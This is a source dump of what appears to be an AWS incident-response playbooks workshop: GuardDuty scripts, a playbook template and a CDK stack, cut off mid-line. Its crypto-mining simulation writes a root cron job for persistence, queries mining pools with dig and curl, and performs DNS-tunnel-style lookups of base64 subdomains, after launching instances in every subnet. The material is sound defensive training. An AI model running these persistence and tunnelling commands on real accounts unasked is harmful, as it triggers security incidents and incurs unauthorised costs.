['${FINDING_TYPE}']}}}' --region ${REGION} --profile ${PROFILE} | jq -r '.FindingIds[]') 15 | echo "finding IDs ${finding_ids}" 16 | echo "this might take some time, please wait" 17 | instance_ids=$(for finding_id in ${finding_ids}; do aws guardduty get-findings --detector-id ${detector_id} --finding-id ${finding_id} --region ${REGION} --profile ${PROFILE}; done | jq -r '.Findings[].Resource.InstanceDetails.InstanceId') 18 | echo "instance IDs ${instance_ids}" 19 | echo ${instance_ids} > instance_ids.txt 20 | 21 | -------------------------------------------------------------------------------- /playbooks/crypto_mining/simulation/simulate_crypto_mining_activity.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | # Copyright Amazon.com, Inc. or its affiliates. All Rights Reserved. 3 | # SPDX-License-Identifier: MIT-0 4 | # 5 | # requirements: AWS CLI profile, jq, AWS Region 6 | # example: ```./simulate_crypto_mining_activity.sh crypto_mining us-east-1``` 7 | # jq download https://stedolan.github.io/jq/download/ 8 | # 9 | # Activity generated: 10 | # - discovery of public Amazon Linux 2 AMIs available in region 11 | # - discovery of VPCs available in AWS account 12 | # - discovery of Networks available in VPCs 13 | # - spin one t2.nano EC2 instance in each subnet for each VPC found 14 | # - EC2 instance has userdata defined in file `userdata.sh` 15 | # - `userdata.sh` performs multiple `dig` commands against known crypto currency related domains. no information 16 | # is exchanged. if GuardDuty is enabled, will trigger crypto mining DNS findings. 
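# note: the simulated indicators are DNS lookups only; with GuardDuty enabled in the region,
# findings such as CryptoCurrency:EC2/BitcoinTool.B!DNS should appear after some delay and can
# be collected with response_scripts/retrieve_guardduty_findings.sh (see that script's header for usage)
#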
17 | PROFILE=${1} 18 | REGION=${2} 19 | echo "retrieving AMZN Linux 2 AMI id" 20 | base_ami=$(aws ec2 describe-images --owners amazon --filters "Name=name,Values=amzn2-ami-hvm-2.0.????????.?-x86_64-gp2" "Name=state,Values=available" --query "reverse(sort_by(Images, &CreationDate))[:1].ImageId" --output text --region ${REGION} --profile ${PROFILE}) 21 | echo "enumerating all VPCs available" 22 | vpcs=$(aws ec2 describe-vpcs --region ${REGION} --profile ${PROFILE} | jq -r '.Vpcs[].VpcId') 23 | echo "" > instances.resources 24 | for vpc in ${vpcs}; do 25 | echo "spinning instances in all subnets of VPC ${vpc}" 26 | subnets=$(aws ec2 describe-subnets --filters Name="vpc-id",Values="${vpc}" --region ${REGION} --profile ${PROFILE} | jq -r '.Subnets[].SubnetId') 27 | for subnet in ${subnets}; do 28 | spun=$(aws ec2 run-instances --user-data file://userdata.sh --image-id ${base_ami} --subnet-id ${subnet} --instance-type t2.nano --region ${REGION} --profile ${PROFILE} | jq -r '.Instances[].InstanceId') 29 | echo "crypto mining started - EC2 instance ${spun} in subnet ${subnet} of VPC ${vpc} using AMI ${base_ami}" 30 | echo "${spun} " >> instances.resources 31 | done 32 | done 33 | echo "resources created to be deleted after playbook is completed" 34 | echo "EC2 instances $(cat instances.resources)" 35 | echo "save the file instances.resources for future use by the bash script undo_simulate_crypto_mining_activity.sh" 36 | echo "end of ${0}" 37 | -------------------------------------------------------------------------------- /playbooks/crypto_mining/simulation/undo_simulate_crypto_mining_activity.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | # Copyright Amazon.com, Inc. or its affiliates. All Rights Reserved. 
3 | # SPDX-License-Identifier: MIT-0 4 | # 5 | # usage `./undo_simulate_crypto_mining_activity.sh 6 | # requirement: use AWS CloudShell with AssumeRole SecurityBreakGlass 7 | # use case: deletes resources created by simulation using file `instances.resources` as input 8 | # 9 | INSTANCES=$(cat instances.resources) 10 | echo "trying to terminate EC2 instances ${INSTANCES}" 11 | for instance in ${INSTANCES}; do 12 | aws ec2 terminate-instances --instance-ids ${instance} &> /dev/null 13 | error=${?} 14 | if [ ${error} -ne 0 ] 15 | then 16 | echo "terminate failed for EC2 instance ${instance} with error ${error}" 17 | fi 18 | done 19 | echo "end of ${0}" 20 | 21 | -------------------------------------------------------------------------------- /playbooks/crypto_mining/simulation/userdata.sh: -------------------------------------------------------------------------------- 1 | Content-Type: multipart/mixed; boundary="//" 2 | MIME-Version: 1.0 3 | 4 | --// 5 | Content-Type: text/cloud-config; charset="us-ascii" 6 | MIME-Version: 1.0 7 | Content-Transfer-Encoding: 7bit 8 | Content-Disposition: attachment; filename="cloud-config.txt" 9 | 10 | #cloud-config 11 | cloud_final_modules: 12 | - [scripts-user, always] 13 | 14 | --// 15 | Content-Type: text/x-shellscript; charset="us-ascii" 16 | MIME-Version: 1.0 17 | Content-Transfer-Encoding: 7bit 18 | Content-Disposition: attachment; filename="userdata.txt" 19 | 20 | #!/bin/bash 21 | mkdir -p /usr/cryptokit 22 | touch /usr/cryptokit/persist.sh 23 | chmod 750 /usr/cryptokit/persist.sh 24 | echo "#!/bin/bash" >> /usr/cryptokit/persist.sh 25 | echo "dig donate.v2.xmrig.com" >> /usr/cryptokit/persist.sh 26 | echo "dig systemten.org" >> /usr/cryptokit/persist.sh 27 | echo "dig xmr.pool.minergate.comac" >> /usr/cryptokit/persist.sh 28 | echo "dig pool.minergate.com" >> /usr/cryptokit/persist.sh 29 | echo "dig dockerupdate.anondns.net" >> /usr/cryptokit/persist.sh 30 | echo "dig rspca-northamptonshire.org.uk" >> /usr/cryptokit/persist.sh 31 | echo "dig xmrpool.eu" >> /usr/cryptokit/persist.sh 32 | echo "dig cryptofollow.com" >> /usr/cryptokit/persist.sh 33 | echo "dig xmr-usa.dwarfpool.com" >> /usr/cryptokit/persist.sh 34 | echo "dig xmr-eu.dwarfpool.com" >> /usr/cryptokit/persist.sh 35 | echo "dig xmr-eu1.nanopool.org" >> /usr/cryptokit/persist.sh 36 | echo "curl -s http://pool.minergate.com/dkjdjkjdlsajdkljalsskajdksakjdksajkllalkdjsalkjdsalkjdlkasj > /dev/null &" >> /usr/cryptokit/persist.sh 37 | echo "curl -s http://xmr.pool.minergate.com/dhdhjkhdjkhdjkhajkhdjskahhjkhjkahdsjkakjasdhkjahdjk > /dev/null &" >> /usr/cryptokit/persist.sh 38 | echo "for i in {1..10};" >> /usr/cryptokit/persist.sh 39 | echo "do" >> /usr/cryptokit/persist.sh 40 | echo " dig CgpMb3JlbSBpcHN1bSBkb2xvciBzaXQgYW1ldC.afsdem.com;" >> /usr/cryptokit/persist.sh 41 | echo " dig wgY29uc2VjdGV0dXIgYWRpcGlzY2luZyBlbGl0.afsdem.com;" >> /usr/cryptokit/persist.sh 42 | echo " dig LiBWZXN0aWJ1bHVtIGFjIHJpc3VzIGRvbG9yLi.afsdem.com;" >> /usr/cryptokit/persist.sh 43 | echo " dig BJbiBldSBpbXBlcmRpZXQgbWksIGlkIHNjZWxl.afsdem.com;" >> /usr/cryptokit/persist.sh 44 | echo " dig cmlzcXVlIG9yY2kuIE51bGxhbSB1dCBsaWJlcm.afsdem.com;" >> /usr/cryptokit/persist.sh 45 | echo " dig 8gcHVydXMuIFBlbGxlbnRlc3F1ZSBhdCBmcmlu.afsdem.com;" >> /usr/cryptokit/persist.sh 46 | echo " dig Z2lsbGEgbWV0dXMsIGFjIHVsdHJpY2VzIGVyYX.afsdem.com;" >> /usr/cryptokit/persist.sh 47 | echo " dig QuIEZ1c2NlIGN1cnN1cyBtb2xsaXMgcmlzdXMg.afsdem.com;" >> /usr/cryptokit/persist.sh 48 | echo " dig 
dXQgdWx0cmljaWVzLiBOYW0gbWFzc2EganVzdG.afsdem.com;" >> /usr/cryptokit/persist.sh 49 | echo " dig 8sIHVsdHJpY2llcyBhdWN0b3IgbWkgdXQsIGRp.afsdem.com;" >> /usr/cryptokit/persist.sh 50 | echo " dig Y3R1bSBsb2JvcnRpcyBudWxsYS4gTnVsbGEgc2.afsdem.com;" >> /usr/cryptokit/persist.sh 51 | echo " dig l0IGFtZXQgZmVsaXMgbm9uIGlwc3VtIHZlc3Rp.afsdem.com;" >> /usr/cryptokit/persist.sh 52 | echo " dig YnVsdW0gcmhvbmN1cy4gTG9yZW0gaXBzdW0gZG.afsdem.com;" >> /usr/cryptokit/persist.sh 53 | echo " dig 9sb3Igc2l0IGFtZXQsIGNvbnNlY3RldHVyIGFk.afsdem.com;" >> /usr/cryptokit/persist.sh 54 | echo " dig aXBpc2NpbmcgZWxpdC4gSW4gZmF1Y2lidXMgaW.afsdem.com;" >> /usr/cryptokit/persist.sh 55 | echo " dig QgZWxpdCBhdCBtYXhpbXVzLiBBbGlxdWFtIGRh.afsdem.com;" >> /usr/cryptokit/persist.sh 56 | echo " dig cGlidXMgdXQgbWF1cmlzIG5lYyBmYXVjaWJ1cy.afsdem.com;" >> /usr/cryptokit/persist.sh 57 | echo " dig 4gUHJvaW4gYXVjdG9yIGxpYmVybyBuZWMgYXVn.afsdem.com;" >> /usr/cryptokit/persist.sh 58 | echo " dig dWUgc2FnaXR0aXMgY29uZGltZW50dW0uIFZlc3.afsdem.com;" >> /usr/cryptokit/persist.sh 59 | echo " dig RpYnVsdW0gYmliZW5kdW0gb2RpbyBxdWFtLCBh.afsdem.com;" >> /usr/cryptokit/persist.sh 60 | echo " dig dCBjb25ndWUgbnVsbGEgdml2ZXJyYSBpbi4gSW.afsdem.com;" >> /usr/cryptokit/persist.sh 61 | echo " dig 4gdWx0cmljaWVzIHR1cnBpcyBhdCBmYWNpbGlz.afsdem.com;" >> /usr/cryptokit/persist.sh 62 | echo " dig aXMgZGljdHVtLiBFdGlhbSBuaXNpIGFudGUsIG.afsdem.com;" >> /usr/cryptokit/persist.sh 63 | echo " dig RpY3R1bSBldCBoZW5kcmVyaXQgbmVjLCBzb2Rh.afsdem.com;" >> /usr/cryptokit/persist.sh 64 | echo " dig bGVzIGlkIGVyb3MuCgpQaGFzZWxsdXMgZmV1Z2.afsdem.com;" >> /usr/cryptokit/persist.sh 65 | echo " dig lhdCBudW5jIHNlZCBzdXNjaXBpdCBmYXVjaWJ1.afsdem.com;" >> /usr/cryptokit/persist.sh 66 | echo " dig cy4gQWVuZWFuIHRpbmNpZHVudCBwb3J0dGl0b3.afsdem.com;" >> /usr/cryptokit/persist.sh 67 | echo " dig IgbmlzbCwgdXQgY3Vyc3VzIGZlbGlzIHZvbHV0.afsdem.com;" >> /usr/cryptokit/persist.sh 68 | echo " dig cGF0IHZpdGFlLiBNb3JiaSBuZWMgbGVvIHB1bH.afsdem.com;" >> /usr/cryptokit/persist.sh 69 | echo " dig ZpbmFyLCBhY2N1bXNhbiBtYXVyaXMgbmVjLCBj.afsdem.com;" >> /usr/cryptokit/persist.sh 70 | echo " dig b21tb2RvIG1hdXJpcy4gTmFtIGNvbW1vZG8gZW.afsdem.com;" >> /usr/cryptokit/persist.sh 71 | echo " dig dldCBlbmltIGF0IGFsaXF1YW0uIFN1c3BlbmRp.afsdem.com;" >> /usr/cryptokit/persist.sh 72 | echo " dig c3NlIGVnZXN0YXMgbWFzc2EgaWQgcmlzdXMgcG.afsdem.com;" >> /usr/cryptokit/persist.sh 73 | echo " dig VsbGVudGVzcXVlIHBvcnR0aXRvciBuZWMgbmVj.afsdem.com;" >> /usr/cryptokit/persist.sh 74 | echo " dig IG5lcXVlLiBDcmFzIG5lYyBzZW0gYXJjdS4gTn.afsdem.com;" >> /usr/cryptokit/persist.sh 75 | echo " dig VsbGEgcXVpcyBzYXBpZW4gaW4gbGFjdXMgbGFj.afsdem.com;" >> /usr/cryptokit/persist.sh 76 | echo " dig aW5pYSB1bHRyaWNlcyBtYXR0aXMgZXQgcHVydX.afsdem.com;" >> /usr/cryptokit/persist.sh 77 | echo " dig MuIE51bmMgZmVybWVudHVtIG5lcXVlIGlkIG51.afsdem.com;" >> /usr/cryptokit/persist.sh 78 | echo " dig bmMgYmxhbmRpdCBtYXhpbXVzLiBEdWlzIGV1IH.afsdem.com;" >> /usr/cryptokit/persist.sh 79 | echo " dig NvbGxpY2l0dWRpbiBudWxsYSwgYWMgbWF0dGlz.afsdem.com;" >> /usr/cryptokit/persist.sh 80 | echo " dig IGF1Z3VlLiBNYXVyaXMgcXVpcyBjdXJzdXMgaX.afsdem.com;" >> /usr/cryptokit/persist.sh 81 | echo " dig BzdW0sIHF1aXMgZnJpbmdpbGxhIHNlbS4gTW9y.afsdem.com;" >> /usr/cryptokit/persist.sh 82 | echo " dig YmkgbWFsZXN1YWRhIHNhcGllbiBzZWQgbWV0dX.afsdem.com;" >> /usr/cryptokit/persist.sh 83 | echo " dig MgY29udmFsbGlzLCBzaXQgYW1ldCBldWlzbW9k.afsdem.com;" >> /usr/cryptokit/persist.sh 84 | echo " dig IGF1Z3VlIHBlbGxlbnRlc3F1ZS4gTW9yYmkgbm.afsdem.com;" >> 
/usr/cryptokit/persist.sh 85 | echo " dig liaCBlcmF0LCBwb3N1ZXJlIHNpdCBhbWV0IGFj.afsdem.com;" >> /usr/cryptokit/persist.sh 86 | echo " dig Y3Vtc2FuIG5lYywgbWFsZXN1YWRhIGEgbGVvLg.afsdem.com;" >> /usr/cryptokit/persist.sh 87 | echo " dig oKRG9uZWMgZXUgcHJldGl1bSBvZGlvLiBBZW5l.afsdem.com;" >> /usr/cryptokit/persist.sh 88 | echo " dig YW4gdHJpc3RpcXVlIHF1YW0gdmVsIG9yY2kgYW.afsdem.com;" >> /usr/cryptokit/persist.sh 89 | echo " dig xpcXVhbSwgbmVjIHNjZWxlcmlzcXVlIG51bmMg.afsdem.com;" >> /usr/cryptokit/persist.sh 90 | echo " dig c3VzY2lwaXQuIEV0aWFtIGVsaXQgc2VtLCB2aX.afsdem.com;" >> /usr/cryptokit/persist.sh 91 | echo " dig ZlcnJhIG5lYyBmcmluZ2lsbGEgdml0YWUsIGV1.afsdem.com;" >> /usr/cryptokit/persist.sh 92 | echo " dig aXNtb2QgaWQgdHVycGlzLiBJbnRlZ2VyIHF1aX.afsdem.com;" >> /usr/cryptokit/persist.sh 93 | echo " dig MgZXJhdCBlZ2V0IGFyY3UgdGluY2lkdW50IHBl.afsdem.com;" >> /usr/cryptokit/persist.sh 94 | echo " dig bGxlbnRlc3F1ZS4gQ3VyYWJpdHVyIHF1YW0gbn.afsdem.com;" >> /usr/cryptokit/persist.sh 95 | echo " dig VsbGEsIGx1Y3R1cyB2ZWwgdm9sdXRwYXQgZWdl.afsdem.com;" >> /usr/cryptokit/persist.sh 96 | echo " dig dCwgZGFwaWJ1cyBldCBudW5jLiBOdW5jIHF1aX.afsdem.com;" >> /usr/cryptokit/persist.sh 97 | echo " dig MgbGliZXJvIGFsaXF1YW0sIGNvbmRpbWVudHVt.afsdem.com;" >> /usr/cryptokit/persist.sh 98 | echo " dig IGp1c3RvIHF1aXMsIGxhY2luaWEgbmVxdWUuIF.afsdem.com;" >> /usr/cryptokit/persist.sh 99 | echo " dig Byb2luIGRhcGlidXMgZWxpdCBhdCBoZW5kcmVy.afsdem.com;" >> /usr/cryptokit/persist.sh 100 | echo " dig aXQgbWF4aW11cy4gU2VkIHNlbXBlciBudW5jIG.afsdem.com;" >> /usr/cryptokit/persist.sh 101 | echo " dig 1hc3NhLCBlZ2V0IHBlbGxlbnRlc3F1ZSBlbGl0.afsdem.com;" >> /usr/cryptokit/persist.sh 102 | echo " dig IHNhZ2l0dGlzIHNlZC4g.afsdem.com;" >> /usr/cryptokit/persist.sh 103 | echo "done" >> /usr/cryptokit/persist.sh 104 | one_call=$(/usr/cryptokit/persist.sh) 105 | touch /var/spool/cron/root 106 | /usr/bin/crontab /var/spool/cron/root 107 | echo "*/15 * * * * /usr/cryptokit/persist.sh" >> /var/spool/cron/root 108 | --// 109 | 110 | -------------------------------------------------------------------------------- /playbooks/template/images/aws_caf.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/aws-samples/aws-incident-response-playbooks-workshop/c996d4cf0117132beea928e537274caa73a8d4e6/playbooks/template/images/aws_caf.png -------------------------------------------------------------------------------- /playbooks/template/images/nist_life_cycle.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/aws-samples/aws-incident-response-playbooks-workshop/c996d4cf0117132beea928e537274caa73a8d4e6/playbooks/template/images/nist_life_cycle.png -------------------------------------------------------------------------------- /playbooks/template/threat_name.md: -------------------------------------------------------------------------------- 1 | --- 2 | 3 | PLEASE NOTE THIS PLAYBOOK USES FICTITIOUS ENTITIES SUCH AS ```AKIAIOSFODNN7EXAMPLE``` FOR *IAM ACCESS KEY ID*, ```198.51.100.77``` FOR *IP ADDRESS*, AND ARBITRARY *DATE RANGES* FOR ATHENA QUERIES AND AWS CLI COMMANDS. YOU WILL NEED TO REPLACE THOSE WITH ACTUALS FROM THE AWS ACCOUNT YOU ARE USING. 4 | 5 | --- 6 | 7 | 8 | # Threat name playbook 9 | 10 | ## The threat 11 | 12 | [//]: # (Describe the threat this playbook addresses) 13 | 14 | This playbook addresses threat alpha which would impact workload bravo. 
The alerts used to trigger this playbook are alert charlie from GuardDuty, or alert echo from CloudWatch Rule foxtrot. 15 | 16 | * * * 17 | 18 | ## Objectives 19 | 20 | [//]: # (replace with your own words what are the expected outcomes by running this playbook) 21 | 22 | Throughout the execution of the playbook, focus on the _***desired outcomes***_, taking notes for enhancement of incident response capabilities. 23 | 24 | ### Determine: 25 | 26 | * **Vulnerabilities exploited** 27 | * **Exploits and tools observed** 28 | * **Actor's intent** 29 | * **Actor's attribution** 30 | * **Damage inflicted to the environment and business** 31 | 32 | ### Recover: 33 | 34 | * **Return to original and hardened configuration** 35 | 36 | ### Enhance CAF Security Perspective components: 37 | [AWS Cloud Adoption Framework Security Perspective](https://d0.awsstatic.com/whitepapers/AWS_CAF_Security_Perspective.pdf) 38 | * **Directive** 39 | * **Detective** 40 | * **Responsive** 41 | * **Preventative** 42 | 43 | ![Image](images/aws_caf.png) 44 | * * * 45 | 46 | ## Response steps 47 | 48 | [//]: # (write down the steps to be taken labeling according to NIST 800-61r2 incident response life-cycle) 49 | 50 | 1. [**ANALYSIS**] Alert validation 51 | 2. [**ANALYSIS**] Scope of the incident 52 | 3. [**ANALYSIS**] Impact to environment 53 | 4. [**CONTAINMENT**] Perform containment 54 | 5. [**RECOVERY**] Perform recovery 55 | 6. [**ERADICATION**] Perform eradication (apply security updates and harden configuration) 56 | 7. [**RECOVERY**] Perform recovery by restoring system data and rebuilding components 57 | 8. [**POST-INCIDENT ACTIVITY**] Perform post-incident activity for preparation enhancement 58 | 59 | ### Incident Response Life Cycle (NIST 800-61r2) 60 | [NIST Computer Security Incident Handling Guide](https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-61r2.pdf) 61 | ![Image](images/nist_life_cycle.png) 62 | 63 | * * * 64 | 65 | ## Activity simulated for this playbook 66 | 67 | [//]: # (describe how the alerts can be simulated for playbook validation purposes) 68 | 69 | 1. Actor performs technique alpha 70 | 2. Actor performs technique bravo 71 | 3. Actor performs technique charlie 72 | 73 | ### Bash scripts found under the simulation directory. 
74 | 75 | Example: 76 | 77 | > ./simulate.sh us-west-2 111122223333 78 | 79 | ``` 80 | #!/bin/bash 81 | region=${1} 82 | victim_account=${2} 83 | echo "this script targets AWS Region=${region} and AWS Account id=${victim_account}" 84 | ``` 85 | Output from bash script: 86 | 87 | ``` 88 | output expected 89 | ``` 90 | 91 | * * * 92 | 93 | ### IAM entitlements used for this playbook 94 | 95 | The following IAM Roles are available in the AWS account to assume: 96 | 97 | #### SecurityAnalystRole 98 | - For Athena queries: custom IAM Policy 99 | - To perform analysis tasks: [ReadOnlyAccess](https://console.aws.amazon.com/iam/home#policies/arn:aws:iam::aws:policy/ReadOnlyAccess) 100 | 101 | #### SecurityDeployRole 102 | - For resource deployment using CloudFormation 103 | 104 | #### SecurityBreakGlassRole 105 | - To perform containment and eradication tasks: [AdministratorAccess](https://console.aws.amazon.com/iam/home#policies/arn:aws:iam::aws:policy/AdministratorAccess) 106 | 107 | #### SecurityAdminRole 108 | - To perform security tool administrative tasks such as Athena or GuardDuty administration: custom IAM Policy 109 | 110 | ## Assuming Roles: 111 | - CloudShell provides a Linux shell environment with temporary credentials for the IAM Role you are currently signed in to the console with. The AWS CLI uses these session tokens by default. 112 | - Alternatively, you can install the AWS CLI on Windows, Linux, or macOS and configure multiple IAM Roles to assume using the `--profile` parameter. 113 | 114 | **All examples in this playbook use the `--profile` parameter to indicate the IAM Role required for the AWS CLI command. If you use CloudShell, remove the `--profile` parameter from the AWS CLI call.** 115 | 116 | * * * 117 | 118 | ## Incident Classification & Handling 119 | 120 | [//]: # (categorize the incident according to your organization's standards) 121 | 122 | * **Tactics, techniques, and procedures**: TTPs 123 | * **Category**: Category 124 | * **Resource**: Resources 125 | * **Tooling**: [AWS Command Line Interface](https://docs.aws.amazon.com/cli/latest/index.html) (CLI), [Amazon Athena](https://docs.aws.amazon.com/athena/latest/ug/querying-AWS-service-logs.html) 126 | * **Indicators**: 127 | * Custom CloudWatch Rule 128 | * [GuardDuty Finding alpha](https://docs.aws.amazon.com/guardduty/latest/ug/guardduty_finding-types-active.html) 129 | * **Log Sources**: AWS CloudTrail, VPC Flow, Route53 VPC DNS, Amazon GuardDuty 130 | * **Teams**: Alpha, Bravo, and Charlie 131 | 132 | * * * 133 | 134 | ## Incident Handling Process 135 | 136 | ### The incident response process comprises the following parts: 137 | 138 | [//]: # (Detail the 'response steps' previously outlined) 139 | 140 | * Part 1: Analysis - Validation 141 | * Part 2: Analysis - Scope 142 | * Part 3: Analysis - Impact 143 | * Part 4: Containment 144 | * Part 5: Eradication 145 | * Part 6: Recovery 146 | * Part 7: Post-Incident Activity 147 | 148 | ### Part 1: Analysis - Validation 149 | 150 | [//]: # (validate alert) 151 | 152 | *Verify the integrity of the alert by checking whether the indicator exists and by comparing the alert data with the alert source. Any mismatch needs to be reported to the team(s) responsible for designing, implementing, and maintaining the guardrail.* 153 | 154 | 1. Compare alert data with alert source 155 | 2. If there is a mismatch, escalate to teams alpha, bravo, and charlie. 
Upon their response, if possible, continue with **Part 2: Analysis - Scope**; otherwise continue to **Part 7: Post-Incident Activity**. 156 | 3. If there is a match, continue to **Part 2: Analysis - Scope** 157 | 158 | 159 | **Retrieve alert data** 160 | 161 | [//]: # (describe how to retrieve the alert data to compare with the alert source) 162 | 163 | ``` 164 | retrieve alert data directions 165 | ``` 166 | 167 | **Queries used for alert validation** 168 | 169 | ``` 170 | SELECT * FROM logs; 171 | 172 | ``` 173 | 174 | ### Part 2: Analysis - Scope 175 | 176 | [//]: # (consolidate the list of all AWS resources affected) 177 | 178 | *Collect the related activity recorded in CloudTrail, VPC Flow, and Route53 VPC DNS for analysis. This data should be saved in a secure location where incident response team members have the appropriate access to perform their role.* 179 | 180 | **Queries used for scoping** 181 | 182 | ``` 183 | SELECT * FROM logs; 184 | 185 | ``` 186 | 187 | [//]: # (check source IP addresses against threat intelligence field) 188 | 189 | **Determine the reputation of the IP addresses the principal used for AWS API calls by checking them against a list containing details such as Cyber Threat Intelligence scores and known/approved IP addresses used by the organization.** 190 | 191 | 192 | ``` 193 | whois 203.0.113.43 194 | ``` 195 | 196 | ### Part 3: Analysis - Impact 197 | 198 | [//]: # (analyze the information gathered throughout scoping) 199 | 200 | Parse through the distilled information looking for patterns, and extrapolate behaviors that contrast with the expected baseline of approved activity. Take a holistic approach: look at the data presented to you and continuously ask yourself whether the constructed patterns represent normal behavior, an external actor, or an insider. The following questions serve as a guide, but don't limit yourself; expand based on your own findings and doubts. Make sure to have *data* backing up your answers: 201 | 202 | 1. What related alerts have been triggered? 203 | 2. What is the classification of the data accessed? 204 | 3. What AWS services are not in the approved use list? 205 | 4. What AWS service configurations have been changed? 206 | 5. What guardrails have been disabled or modified? 207 | 6. Was the actor an insider or outsider? 208 | 7. What evidence supports benign and malicious activity? 209 | 8. What is the impact to business applications and processes? 210 | 9. Is there any indication of possible exfiltration of data? 
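Answers carry more weight with the supporting query output attached as evidence. One way to capture it, sketched below with the AWS CLI and assuming the workshop's ```IRWorkshopWorkgroup``` Athena workgroup (substitute your own workgroup and query):

```
# run a scoping query through the CLI and fetch its results as evidence (sketch)
query_id=$(aws athena start-query-execution \
  --work-group IRWorkshopWorkgroup \
  --query-string "SELECT * FROM logs;" \
  --query 'QueryExecutionId' --output text \
  --profile SecurityAnalystRole)
# wait for the query to reach the SUCCEEDED state before fetching in real use
aws athena get-query-results --query-execution-id ${query_id} --profile SecurityAnalystRole
```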
211 | 212 | ### Part 4: Containment 213 | 214 | [//]: # (prevent further damage to the environment and business processes) 215 | 216 | ### Part 5: Eradication 217 | 218 | [//]: # (destroy all components configured by the actor) 219 | 220 | ### Part 6: Recovery 221 | 222 | [//]: # (restore configuration from backup and rebuild components as needed) 223 | 224 | ### Part 7: Post-Incident Activity 225 | 226 | [//]: # (review all notes taken during the incident, submit for review proposed changes to enhance the security posture and incident response capabilities) 227 | 228 | 229 | * * * 230 | -------------------------------------------------------------------------------- /readme-images/diagram.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/aws-samples/aws-incident-response-playbooks-workshop/c996d4cf0117132beea928e537274caa73a8d4e6/readme-images/diagram.png -------------------------------------------------------------------------------- /remove_cdk_metadata.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | # automatic removal of references to AWS CDK bootstrap using `yq` 3 | yq -i 'del(.Rules)' cdk.out/WorkshopStack.yaml 4 | yq -i 'del(.Conditions)' cdk.out/WorkshopStack.yaml 5 | yq -i 'del(.Parameters.BootstrapVersion)' cdk.out/WorkshopStack.yaml 6 | yq -i 'del(.Resources.CDKMetadata)' cdk.out/WorkshopStack.yaml 7 | # end -------------------------------------------------------------------------------- /requirements.txt: -------------------------------------------------------------------------------- 1 | pylint 2 | black 3 | -e . -------------------------------------------------------------------------------- /setup.py: -------------------------------------------------------------------------------- 1 | # Copyright Amazon.com, Inc. or its affiliates. All Rights Reserved. 2 | # SPDX-License-Identifier: MIT-0 3 | import setuptools 4 | 5 | AWS_CDK_VERSION = "2.128" 6 | 7 | with open("README.md") as fp: 8 | long_description = fp.read() 9 | 10 | 11 | setuptools.setup( 12 | name="BuildingAWSIRPlaybooksWorkshop", 13 | version="1.0", 14 | 15 | description="Building playbooks for incident response in AWS workshop", 16 | long_description=long_description, 17 | long_description_content_type="text/markdown", 18 | 19 | author="AWS", 20 | 21 | package_dir={"": "."}, 22 | packages=setuptools.find_packages(where="."), 23 | 24 | install_requires=[ 25 | "aws-cdk-lib==" + AWS_CDK_VERSION, 26 | ], 27 | 28 | python_requires=">=3.10", 29 | 30 | classifiers=[ 31 | "Development Status :: 4 - Beta", 32 | "Intended Audience :: Developers", 33 | "Programming Language :: JavaScript", 34 | "Programming Language :: Python :: 3 :: Only", 35 | "Programming Language :: Python :: 3.10", 36 | "Programming Language :: Python :: 3.11", 37 | "Topic :: Software Development :: Code Generators", 38 | "Topic :: Utilities", 39 | "Typing :: Typed", 40 | ], 41 | ) 42 | -------------------------------------------------------------------------------- /workshop_stack.py: -------------------------------------------------------------------------------- 1 | """ 2 | # Copyright Amazon.com, Inc. or its affiliates. All Rights Reserved. 
3 | # SPDX-License-Identifier: MIT-0 4 | 5 | # Building Incident Response Playbooks for AWS 6 | 7 | ## Workshop stack 8 | """ 9 | from aws_cdk import ( 10 | Aws, 11 | Stack, 12 | CfnOutput, 13 | CfnParameter, 14 | aws_s3, 15 | aws_athena, 16 | aws_cloudtrail, 17 | aws_glue, 18 | aws_ec2, 19 | aws_route53resolver, 20 | aws_iam, 21 | ) 22 | 23 | from constructs import Construct 24 | 25 | class WorkshopStack(Stack): 26 | def __init__(self, scope: Construct, construct_id: str, **kwargs) -> None: 27 | super().__init__(scope, construct_id, **kwargs) 28 | 29 | logging_bucket = aws_s3.Bucket( 30 | self, 31 | "BucketLogs", 32 | block_public_access=aws_s3.BlockPublicAccess.BLOCK_ALL, 33 | encryption=aws_s3.BucketEncryption.S3_MANAGED, 34 | ) 35 | athena_bucket = aws_s3.Bucket( 36 | self, 37 | "BucketAthena", 38 | ) 39 | cloudtrail_trail = aws_cloudtrail.Trail( 40 | self, 41 | "Trail", 42 | is_multi_region_trail=True, 43 | enable_file_validation=True, 44 | bucket=logging_bucket, 45 | trail_name="IRWorkshopTrail", 46 | ) 47 | logging_bucket.add_to_resource_policy( 48 | aws_iam.PolicyStatement( 49 | sid="AllowAWSServiceGetBucketAcl", 50 | effect=aws_iam.Effect.ALLOW, 51 | principals=[aws_iam.ServicePrincipal(service="delivery.logs.amazonaws.com")], 52 | actions=["s3:GetBucketAcl"], 53 | resources=[logging_bucket.bucket_arn], 54 | ) 55 | ) 56 | logging_bucket.add_to_resource_policy( 57 | aws_iam.PolicyStatement( 58 | sid="AllowAWSServicePutObject", 59 | effect=aws_iam.Effect.ALLOW, 60 | principals=[aws_iam.ServicePrincipal(service="delivery.logs.amazonaws.com")], 61 | actions=["s3:PutObject"], 62 | resources=[logging_bucket.bucket_arn + "/*"], 63 | conditions={ 64 | "StringEquals": { 65 | "s3:x-amz-acl": "bucket-owner-full-control" 66 | } 67 | }, 68 | ) 69 | ) 70 | cloudtrail_trail.log_all_s3_data_events() 71 | vpc_subnets = [aws_ec2.SubnetConfiguration( 72 | subnet_type=aws_ec2.SubnetType.PUBLIC, 73 | name="Public", 74 | cidr_mask=24 75 | ), 76 | aws_ec2.SubnetConfiguration( 77 | subnet_type=aws_ec2.SubnetType.PRIVATE_ISOLATED, 78 | name="Private", 79 | cidr_mask=24 80 | )] 81 | vpc = aws_ec2.Vpc( 82 | self, 83 | "VPC", 84 | ip_addresses=aws_ec2.IpAddresses.cidr("192.168.0.0/16"), 85 | max_azs=2, 86 | subnet_configuration=vpc_subnets, 87 | nat_gateways=0, 88 | ) 89 | security_group = aws_ec2.SecurityGroup( 90 | self, 91 | "SecurityGroup", 92 | vpc=vpc, 93 | description="Allow all outbound and allow SSH from the internet", 94 | ) 95 | security_group.add_ingress_rule( 96 | connection=aws_ec2.Port.tcp(443), 97 | 